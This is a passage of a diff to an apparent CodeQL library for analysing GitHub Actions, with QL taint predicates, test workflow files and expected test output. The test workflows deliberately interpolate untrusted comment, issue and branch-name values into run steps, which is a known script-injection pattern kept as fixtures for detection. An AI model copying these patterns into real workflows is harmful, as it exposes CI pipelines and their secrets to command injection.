"{", "ENV{"] + varName + "%") + ) +} + +predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + // we store the taint on the enclosing job since the may not exist an implicit env attribute + succ.asExpr() = run.getEnclosingJob() and + Utils::writeToGitHubEnv(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + ) +} + /** * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 * - run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT - echo "CHANGELOGEOF" >> $GITHUB_OUTPUT - run: | - EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) - echo "status<<$EOF" >> $GITHUB_OUTPUT - echo "$(cat status.output.json)" >> $GITHUB_OUTPUT - echo "$EOF" >> $GITHUB_OUTPUT - run: | - echo "response<<$EOF" >> $GITHUB_OUTPUT - echo $output >> $GITHUB_OUTPUT - echo "$EOF" >> $GITHUB_OUTPUT - run: | - { - echo 'JSON_RESPONSE<> "$GITHUB_ENV" + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + - run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - run: | + cat <<-"EOF" > event.json + ${{ toJson(github.event) }} + EOF diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index a6be2226b8c..c08d4c824e1 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,2 +1,521 @@ -ERROR: Could not resolve predicate extractLineAssignment/4 (test.ql:85,5-33) -ERROR: Could not resolve predicate extractLineAssignment/4 (test.ql:103,5-33) +files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | 